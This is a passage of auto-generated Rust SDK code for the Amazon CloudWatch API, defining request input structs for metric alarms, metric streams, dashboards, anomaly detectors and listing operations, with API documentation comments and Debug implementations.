/// <p>Tags can help you organize and categorize your resources. You can also use them to scope user
/// permissions by granting a user
/// permission to access or change only resources with certain tag values.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for PutMetricStreamInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutMetricStreamInput");
formatter.field("name", &self.name);
formatter.field("include_filters", &self.include_filters);
formatter.field("exclude_filters", &self.exclude_filters);
formatter.field("firehose_arn", &self.firehose_arn);
formatter.field("role_arn", &self.role_arn);
formatter.field("output_format", &self.output_format);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutMetricDataInput {
/// <p>The namespace for the metric data.</p>
/// <p>To avoid conflicts
/// with AWS service namespaces, you should not specify a namespace that begins with <code>AWS/</code>
/// </p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The data for the metric. The array can include no more than 20 metrics per call.</p>
pub metric_data: std::option::Option<std::vec::Vec<crate::model::MetricDatum>>,
}
impl std::fmt::Debug for PutMetricDataInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutMetricDataInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_data", &self.metric_data);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutMetricAlarmInput {
/// <p>The name for the alarm. This name must be unique within the Region.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>The description for the alarm.</p>
pub alarm_description: std::option::Option<std::string::String>,
/// <p>Indicates whether actions should be executed during any changes to the alarm state. The default is
/// <code>TRUE</code>.</p>
pub actions_enabled: std::option::Option<bool>,
/// <p>The actions to execute when this alarm transitions to an <code>OK</code> state
/// from any other state. Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:automate:<i>region</i>:ec2:stop</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:terminate</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:recover</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:reboot</code> |
/// <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code> |
/// <code>arn:aws:autoscaling:<i>region</i>:<i>account-id</i>:scalingPolicy:<i>policy-id</i>:autoScalingGroupName/<i>group-friendly-name</i>:policyName/<i>policy-friendly-name</i>
/// </code>
/// </p>
/// <p>Valid Values (for use with IAM roles):
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Stop/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Terminate/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Reboot/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Recover/1.0</code>
/// </p>
pub ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The actions to execute when this alarm transitions to the <code>ALARM</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:automate:<i>region</i>:ec2:stop</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:terminate</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:recover</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:reboot</code> |
/// <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code> |
/// <code>arn:aws:autoscaling:<i>region</i>:<i>account-id</i>:scalingPolicy:<i>policy-id</i>:autoScalingGroupName/<i>group-friendly-name</i>:policyName/<i>policy-friendly-name</i>
/// </code>
/// | <code>arn:aws:ssm:<i>region</i>:<i>account-id</i>:opsitem:<i>severity</i>
/// </code>
/// </p>
/// <p>Valid Values (for use with IAM roles):
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Stop/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Terminate/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Reboot/1.0</code>
/// </p>
pub alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The actions to execute when this alarm transitions to the <code>INSUFFICIENT_DATA</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:automate:<i>region</i>:ec2:stop</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:terminate</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:recover</code> |
/// <code>arn:aws:automate:<i>region</i>:ec2:reboot</code> |
/// <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code> |
/// <code>arn:aws:autoscaling:<i>region</i>:<i>account-id</i>:scalingPolicy:<i>policy-id</i>:autoScalingGroupName/<i>group-friendly-name</i>:policyName/<i>policy-friendly-name</i>
/// </code>
/// </p>
/// <p>Valid Values (for use with IAM roles):
/// <code>>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Stop/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Terminate/1.0</code> |
/// <code>arn:aws:swf:<i>region</i>:<i>account-id</i>:action/actions/AWS_EC2.InstanceId.Reboot/1.0</code>
/// </p>
pub insufficient_data_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The name for the metric associated with the alarm. For each <code>PutMetricAlarm</code>
/// operation, you must specify either <code>MetricName</code> or a <code>Metrics</code> array.</p>
/// <p>If you are creating an alarm based on a math expression, you cannot specify this parameter, or any of the
/// <code>Dimensions</code>, <code>Period</code>,
/// <code>Namespace</code>, <code>Statistic</code>, or <code>ExtendedStatistic</code> parameters. Instead, you specify
/// all this information in the <code>Metrics</code> array.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The namespace for the metric associated specified in <code>MetricName</code>.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The statistic for the metric specified in <code>MetricName</code>, other than percentile.
/// For percentile statistics, use <code>ExtendedStatistic</code>. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
/// specify either <code>Statistic</code> or <code>ExtendedStatistic,</code> but not both.</p>
pub statistic: std::option::Option<crate::model::Statistic>,
/// <p>The percentile statistic for the metric specified in <code>MetricName</code>. Specify a value
/// between p0.0 and p100. When you call <code>PutMetricAlarm</code> and specify
/// a <code>MetricName</code>, you must
/// specify either <code>Statistic</code> or <code>ExtendedStatistic,</code> but not both.</p>
pub extended_statistic: std::option::Option<std::string::String>,
/// <p>The dimensions for the metric specified in <code>MetricName</code>.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The length, in seconds, used each time the metric specified in <code>MetricName</code> is
/// evaluated. Valid values are 10, 30, and any multiple of 60.</p>
/// <p>
/// <code>Period</code> is required for alarms based on static thresholds. If
/// you are creating an alarm based on a metric math expression, you specify the
/// period for each metric within the objects in the <code>Metrics</code> array.</p>
/// <p>Be sure to specify 10 or 30 only for metrics that are stored by a <code>PutMetricData</code> call with a
/// <code>StorageResolution</code> of 1. If you specify a period of 10 or 30 for a metric that does not have
/// sub-minute resolution, the alarm still attempts to gather data at the period rate that you specify. In this case,
/// it does not receive data for the attempts that do not correspond to a one-minute data resolution, and the alarm
/// might often lapse into INSUFFICENT_DATA status. Specifying 10 or 30 also sets this alarm as a high-resolution alarm,
/// which has a higher charge than other alarms. For more information about pricing, see <a href="https://aws.amazon.com/cloudwatch/pricing/">Amazon CloudWatch Pricing</a>.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so <code>Period</code> multiplied by <code>EvaluationPeriods</code> cannot be more than 86,400 seconds.</p>
pub period: std::option::Option<i32>,
/// <p>The unit of measure for the statistic. For example, the units for the Amazon EC2
/// NetworkIn metric are Bytes because NetworkIn tracks the number of bytes that an instance
/// receives on all network interfaces. You can also specify a unit when you create a custom
/// metric. Units help provide conceptual meaning to your data. Metric data points that
/// specify a unit of measure, such as Percent, are aggregated separately.</p>
/// <p>If you don't specify <code>Unit</code>, CloudWatch retrieves all unit types that have been published for the
/// metric and attempts to evaluate the alarm.
/// Usually, metrics are
/// published with only one unit, so the alarm
/// works as intended.</p>
/// <p>However, if the metric is published with multiple types of units and you don't specify a unit, the alarm's
/// behavior is not defined and
/// it behaves predictably.</p>
/// <p>We recommend omitting <code>Unit</code> so that you don't inadvertently
/// specify an incorrect unit that is not published for this metric. Doing so
/// causes the alarm to be stuck in the <code>INSUFFICIENT DATA</code> state.</p>
pub unit: std::option::Option<crate::model::StandardUnit>,
/// <p>The number of periods over which data is compared to the specified threshold. If you are
/// setting an alarm that requires that a number of consecutive data points be breaching to
/// trigger the alarm, this value specifies that number. If you are setting an "M out of N"
/// alarm, this value is the N.</p>
/// <p>An alarm's total current evaluation period can
/// be no longer than one day, so this number multiplied by <code>Period</code> cannot be more than 86,400 seconds.</p>
pub evaluation_periods: std::option::Option<i32>,
/// <p>The number of data points that must be breaching to trigger the alarm. This is used only if you are setting
/// an "M out of N" alarm. In that case, this value is the M. For more information, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarm-evaluation">Evaluating an Alarm</a> in the
/// <i>Amazon CloudWatch User Guide</i>.</p>
pub datapoints_to_alarm: std::option::Option<i32>,
/// <p>The value against which the specified statistic is compared.</p>
/// <p>This parameter is required for alarms based on static thresholds, but should
/// not be used for alarms based on anomaly detection models.</p>
pub threshold: std::option::Option<f64>,
/// <p> The arithmetic operation to use when comparing the specified statistic and
/// threshold. The specified statistic value is used as the first operand.</p>
/// <p>The values <code>LessThanLowerOrGreaterThanUpperThreshold</code>,
/// <code>LessThanLowerThreshold</code>, and <code>GreaterThanUpperThreshold</code>
/// are used only for alarms based on anomaly detection models.</p>
pub comparison_operator: std::option::Option<crate::model::ComparisonOperator>,
/// <p> Sets how this alarm is to handle missing data points. If <code>TreatMissingData</code> is omitted, the default behavior of <code>missing</code> is used.
/// For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#alarms-and-missing-data">Configuring How CloudWatch
/// Alarms Treats Missing Data</a>.</p>
/// <p>Valid Values: <code>breaching | notBreaching | ignore | missing</code>
/// </p>
pub treat_missing_data: std::option::Option<std::string::String>,
/// <p> Used only for alarms based on percentiles. If you specify <code>ignore</code>, the alarm state does not change during periods with too few data points to be
/// statistically significant. If you specify <code>evaluate</code> or omit this parameter, the alarm is always evaluated and possibly changes state
/// no matter how many data points are available. For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html#percentiles-with-low-samples">Percentile-Based CloudWatch Alarms and Low Data Samples</a>.</p>
/// <p>Valid Values: <code>evaluate | ignore</code>
/// </p>
pub evaluate_low_sample_count_percentile: std::option::Option<std::string::String>,
/// <p>An array of <code>MetricDataQuery</code> structures that enable you to create an alarm based on the result of a
/// metric math expression. For each <code>PutMetricAlarm</code>
/// operation, you must specify either <code>MetricName</code> or a <code>Metrics</code> array.</p>
/// <p>Each item in the <code>Metrics</code> array either retrieves a metric or performs a math expression.</p>
/// <p>One item in the <code>Metrics</code> array is the expression that the alarm watches. You designate this expression
/// by setting <code>ReturnData</code> to true for this object in the array. For more information, see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_MetricDataQuery.html">MetricDataQuery</a>.</p>
/// <p>If you use the <code>Metrics</code> parameter, you cannot include the <code>MetricName</code>, <code>Dimensions</code>, <code>Period</code>,
/// <code>Namespace</code>, <code>Statistic</code>, or <code>ExtendedStatistic</code> parameters of <code>PutMetricAlarm</code> in the same operation.
/// Instead, you retrieve
/// the metrics you are using in your math expression as part of the <code>Metrics</code> array.</p>
pub metrics: std::option::Option<std::vec::Vec<crate::model::MetricDataQuery>>,
/// <p>A list of key-value pairs to associate with the alarm. You can associate as many as 50 tags with an alarm.</p>
/// <p>Tags can help you organize and categorize your resources. You can also use them to scope user
/// permissions by granting a user
/// permission to access or change only resources with certain tag values.</p>
/// <p>If you are using this operation to update an existing alarm, any tags
/// you specify in this parameter are ignored. To change the tags of an existing alarm, use
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_TagResource.html">TagResource</a>
/// or <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_UntagResource.html">UntagResource</a>.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
/// <p>If this is an alarm based on an anomaly detection model, make this value match
/// the ID of
/// the <code>ANOMALY_DETECTION_BAND</code> function.</p>
/// <p>For an example of how to use this parameter, see the
/// <b>Anomaly Detection
/// Model Alarm</b> example on this page.</p>
/// <p>If your alarm uses this parameter, it cannot have Auto Scaling actions.</p>
pub threshold_metric_id: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for PutMetricAlarmInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutMetricAlarmInput");
formatter.field("alarm_name", &self.alarm_name);
formatter.field("alarm_description", &self.alarm_description);
formatter.field("actions_enabled", &self.actions_enabled);
formatter.field("ok_actions", &self.ok_actions);
formatter.field("alarm_actions", &self.alarm_actions);
formatter.field("insufficient_data_actions", &self.insufficient_data_actions);
formatter.field("metric_name", &self.metric_name);
formatter.field("namespace", &self.namespace);
formatter.field("statistic", &self.statistic);
formatter.field("extended_statistic", &self.extended_statistic);
formatter.field("dimensions", &self.dimensions);
formatter.field("period", &self.period);
formatter.field("unit", &self.unit);
formatter.field("evaluation_periods", &self.evaluation_periods);
formatter.field("datapoints_to_alarm", &self.datapoints_to_alarm);
formatter.field("threshold", &self.threshold);
formatter.field("comparison_operator", &self.comparison_operator);
formatter.field("treat_missing_data", &self.treat_missing_data);
formatter.field(
"evaluate_low_sample_count_percentile",
&self.evaluate_low_sample_count_percentile,
);
formatter.field("metrics", &self.metrics);
formatter.field("tags", &self.tags);
formatter.field("threshold_metric_id", &self.threshold_metric_id);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutInsightRuleInput {
/// <p>A unique name for the rule.</p>
pub rule_name: std::option::Option<std::string::String>,
/// <p>The state of the rule. Valid values are ENABLED and DISABLED.</p>
pub rule_state: std::option::Option<std::string::String>,
/// <p>The definition of the rule, as a JSON object. For details on the valid syntax, see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/ContributorInsights-RuleSyntax.html">Contributor Insights
/// Rule Syntax</a>.</p>
pub rule_definition: std::option::Option<std::string::String>,
/// <p>A list of key-value pairs to associate with the Contributor Insights rule.
/// You can associate as many as 50 tags with a rule.</p>
/// <p>Tags can help you organize and categorize your
/// resources. You can also use them to scope user permissions, by
/// granting a user permission to access or change only the resources that have
/// certain tag values.</p>
/// <p>To be able to associate tags with a rule, you must have the <code>cloudwatch:TagResource</code>
/// permission in addition to the <code>cloudwatch:PutInsightRule</code> permission.</p>
/// <p>If you are using this operation to update an existing Contributor Insights rule, any tags
/// you specify in this parameter are ignored. To change the tags of an existing rule, use
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_TagResource.html">TagResource</a>.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for PutInsightRuleInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutInsightRuleInput");
formatter.field("rule_name", &self.rule_name);
formatter.field("rule_state", &self.rule_state);
formatter.field("rule_definition", &self.rule_definition);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutDashboardInput {
/// <p>The name of the dashboard. If a dashboard with this name already exists, this call modifies that dashboard, replacing
/// its current contents. Otherwise, a new dashboard is created. The maximum length is 255, and valid characters are
/// A-Z, a-z, 0-9, "-", and "_". This parameter is required.</p>
pub dashboard_name: std::option::Option<std::string::String>,
/// <p>The detailed information about the dashboard in JSON format, including the widgets to include and their location
/// on the dashboard. This parameter is required.</p>
/// <p>For more information about the syntax,
/// see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Dashboard-Body-Structure.html">Dashboard Body Structure and Syntax</a>.</p>
pub dashboard_body: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for PutDashboardInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutDashboardInput");
formatter.field("dashboard_name", &self.dashboard_name);
formatter.field("dashboard_body", &self.dashboard_body);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutCompositeAlarmInput {
/// <p>Indicates whether actions should be executed during any changes to the alarm state of the composite alarm. The default is
/// <code>TRUE</code>.</p>
pub actions_enabled: std::option::Option<bool>,
/// <p>The actions to execute when this alarm transitions to the <code>ALARM</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code>
/// | <code>arn:aws:ssm:<i>region</i>:<i>account-id</i>:opsitem:<i>severity</i>
/// </code>
/// </p>
pub alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The description for the composite alarm.</p>
pub alarm_description: std::option::Option<std::string::String>,
/// <p>The name for the composite alarm. This name must be unique within the Region.</p>
pub alarm_name: std::option::Option<std::string::String>,
/// <p>An expression that specifies which other alarms are to be evaluated to determine this
/// composite alarm's state. For each alarm that you reference, you
/// designate a function that
/// specifies whether that alarm needs to be in ALARM state, OK state, or INSUFFICIENT_DATA state. You
/// can use operators (AND, OR and NOT) to combine multiple functions in a single expression. You can use parenthesis to logically group the
/// functions in your expression.</p>
/// <p>You can use either alarm names or ARNs to reference the other alarms that are to be evaluated.</p>
/// <p>Functions can include the following:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>OK("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in OK state.</p>
/// </li>
/// <li>
/// <p>
/// <code>INSUFFICIENT_DATA("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in INSUFFICIENT_DATA state.</p>
/// </li>
/// <li>
/// <p>
/// <code>TRUE</code> always evaluates to TRUE.</p>
/// </li>
/// <li>
/// <p>
/// <code>FALSE</code> always evaluates to FALSE.</p>
/// </li>
/// </ul>
/// <p>TRUE and FALSE are useful for testing a complex <code>AlarmRule</code> structure, and
/// for testing your alarm actions.</p>
/// <p>Alarm names specified in <code>AlarmRule</code> can be surrounded with double-quotes ("), but do not have to be.</p>
/// <p>The following
/// are some examples of <code>AlarmRule</code>:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND ALARM(DiskReadOpsTooHigh)</code> specifies that the composite alarm goes into ALARM state only
/// if both CPUUtilizationTooHigh and DiskReadOpsTooHigh alarms are in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND NOT ALARM(DeploymentInProgress)</code>
/// specifies that the alarm goes to ALARM state if CPUUtilizationTooHigh is in ALARM state
/// and DeploymentInProgress is not in ALARM state. This example reduces
/// alarm noise during a known deployment window.</p>
/// </li>
/// <li>
/// <p>
/// <code>(ALARM(CPUUtilizationTooHigh) OR ALARM(DiskReadOpsTooHigh)) AND OK(NetworkOutTooHigh)</code> goes into ALARM
/// state if CPUUtilizationTooHigh OR DiskReadOpsTooHigh is in ALARM state, and if NetworkOutTooHigh is in OK state.
/// This provides another example of using a composite alarm to prevent noise. This rule ensures that you are not notified with an
/// alarm action on high CPU or disk usage if a known network problem is also occurring.</p>
/// </li>
/// </ul>
/// <p>The <code>AlarmRule</code> can specify as many as 100
/// "children" alarms. The <code>AlarmRule</code> expression can have as many as 500 elements. Elements
/// are child alarms, TRUE or FALSE statements, and
/// parentheses.</p>
pub alarm_rule: std::option::Option<std::string::String>,
/// <p>The actions to execute when this alarm transitions to the <code>INSUFFICIENT_DATA</code> state from any other state.
/// Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code>
/// </p>
pub insufficient_data_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>The actions to execute when this alarm transitions to an <code>OK</code> state
/// from any other state. Each action is specified as an Amazon Resource Name (ARN).</p>
/// <p>Valid Values: <code>arn:aws:sns:<i>region</i>:<i>account-id</i>:<i>sns-topic-name</i>
/// </code>
/// </p>
pub ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
/// <p>A list of key-value pairs to associate with the composite alarm. You can associate as many as 50 tags with an alarm.</p>
/// <p>Tags can help you organize and categorize your
/// resources. You can also use them to scope user permissions, by granting a user permission to access or change only resources with
/// certain tag values.</p>
pub tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl std::fmt::Debug for PutCompositeAlarmInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutCompositeAlarmInput");
formatter.field("actions_enabled", &self.actions_enabled);
formatter.field("alarm_actions", &self.alarm_actions);
formatter.field("alarm_description", &self.alarm_description);
formatter.field("alarm_name", &self.alarm_name);
formatter.field("alarm_rule", &self.alarm_rule);
formatter.field("insufficient_data_actions", &self.insufficient_data_actions);
formatter.field("ok_actions", &self.ok_actions);
formatter.field("tags", &self.tags);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct PutAnomalyDetectorInput {
/// <p>The namespace of the metric to create the anomaly detection model for.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The name of the metric to create the anomaly detection model for.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The metric dimensions to create the anomaly detection model for.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
/// <p>The statistic to use for the metric and the anomaly detection model.</p>
pub stat: std::option::Option<std::string::String>,
/// <p>The configuration specifies details about how the
/// anomaly detection model is to be trained, including
/// time ranges to exclude when training and updating the model.
/// You can specify as many as 10 time ranges.</p>
/// <p>The configuration can also include the time zone to use for
/// the metric.</p>
pub configuration: std::option::Option<crate::model::AnomalyDetectorConfiguration>,
}
impl std::fmt::Debug for PutAnomalyDetectorInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("PutAnomalyDetectorInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("stat", &self.stat);
formatter.field("configuration", &self.configuration);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListTagsForResourceInput {
/// <p>The ARN of the CloudWatch resource that you want to view tags for.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
pub resource_arn: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ListTagsForResourceInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListTagsForResourceInput");
formatter.field("resource_arn", &self.resource_arn);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListMetricStreamsInput {
/// <p>Include this value, if it was returned by the previous call, to get the next set of metric streams.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>The maximum number of results to return in one operation.</p>
pub max_results: std::option::Option<i32>,
}
impl std::fmt::Debug for ListMetricStreamsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListMetricStreamsInput");
formatter.field("next_token", &self.next_token);
formatter.field("max_results", &self.max_results);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListMetricsInput {
/// <p>The metric namespace to filter against. Only the namespace that matches exactly
/// will be returned.</p>
pub namespace: std::option::Option<std::string::String>,
/// <p>The name of the metric to filter against. Only the metrics with names that match exactly
/// will be returned.</p>
pub metric_name: std::option::Option<std::string::String>,
/// <p>The dimensions to filter against. Only the dimensions that match exactly
/// will be returned.</p>
pub dimensions: std::option::Option<std::vec::Vec<crate::model::DimensionFilter>>,
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub next_token: std::option::Option<std::string::String>,
/// <p>To filter the results to show only metrics that have had data points published
/// in the past three hours, specify this parameter
/// with a value of <code>PT3H</code>. This is the only valid value
/// for this parameter.</p>
/// <p>The results that are returned are an approximation of the value you specify. There
/// is a low probability that the returned results include metrics with last published
/// data as much as 40 minutes more than the specified time interval.</p>
pub recently_active: std::option::Option<crate::model::RecentlyActive>,
}
impl std::fmt::Debug for ListMetricsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListMetricsInput");
formatter.field("namespace", &self.namespace);
formatter.field("metric_name", &self.metric_name);
formatter.field("dimensions", &self.dimensions);
formatter.field("next_token", &self.next_token);
formatter.field("recently_active", &self.recently_active);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ListDashboardsInput {
/// <p>If you specify this parameter, only
/// the dashboards with names starting with the specified string are listed. The maximum length is 255, and
/// valid characters are A-Z, a-z, 0-9, ".", "-", and "_".
/// </p>
pub dashboard_name_prefix: std::option::Option<std::string::String>,
/// <p>The token returned by a previous call to indicate that there is more data available.</p>
pub next_token: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for ListDashboardsInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("ListDashboardsInput");
formatter.field("dashboard_name_prefix", &self.dashboard_name_prefix);
formatter.field("next_token", &self.next_token);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct GetMetricWidgetImageInput {
/// <p>A JSON string that defines the bitmap graph to be retrieved. The string includes the
/// metrics to include in the graph, statistics, annotations, title, axis limits, and so on.
/// You can include only one <code>MetricWidget</code> parameter in each <code>GetMetricWidgetImage</code> call.</p>
/// <p>For more information about the syntax of <code>MetricWidget</code> see
/// <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Metric-Widget-Structure.html">GetMetricWidgetImage: Metric Widget Structure and Syntax</a>.</p>
/// <p>If any metric on the graph could not load all the requested data points, an orange triangle with an exclamation
/// point appears next to the graph legend.</p>
pub metric_widget: std::option::Option<std::string::String>,
/// <p>The format of the resulting image. Only PNG images are supported.</p>
/// <p>The default is <code>png</code>. If you specify <code>png</code>, the API returns an HTTP response with the
/// content-type set to <code>text/xml</code>. The image data is in a <code>MetricWidgetImage</code>
/// field. For example:</p>
/// <p>
/// <code>
/// <GetMetricWidgetImageResponse xmlns=<URLstring>></code>
/// </p>
/// <p>
/// <code> <GetMetricWidgetImageResult></code>
/// </p>
/// <p>
/// <code> <MetricWidgetImage></code>
/// </p>
/// <p>
/// <code> iVBORw0KGgoAAAANSUhEUgAAAlgAAAGQEAYAAAAip...</code>
/// </p>
/// <p>
/// <code> </MetricWidgetImage></code>
/// </p>
/// <p>
/// <code> </GetMetricWidgetImageResult></code>
/// </p>
/// <p>
/// <code> <ResponseMetadata></code>
/// </p>
/// <p>
/// <code> <RequestId>6f0d4192-4d42-11e8-82c1-f539a07e0e3b</RequestId></code>
/// </p>
/// <p>
/// <code> </ResponseMetadata></code>
/// </p>
/// <p>
/// <code></GetMetricWidgetImageResponse></code>
/// </p>
/// <p>The <code>image/png</code> setting is intended only for custom HTTP requests. For most
/// use cases, and all actions using an AWS SDK, you should use <code>png</code>. If you specify
/// <code>image/png</code>, the HTTP response has a content-type set to <code>image/png</code>,
/// and the body of the response is a PNG image. </p>
pub output_format: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for GetMetricWidgetImageInput {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut formatter = f.debug_struct("GetMetricWidgetImageInput");
formatter.field("metric_widget", &self.metric_widget);
formatter.field("output_format", &self.output_format);
formatter.finish()
}
}
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
